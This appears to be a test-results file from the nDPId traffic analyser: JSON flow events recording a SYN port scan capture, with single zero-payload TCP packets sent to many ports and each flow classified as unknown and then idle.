-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
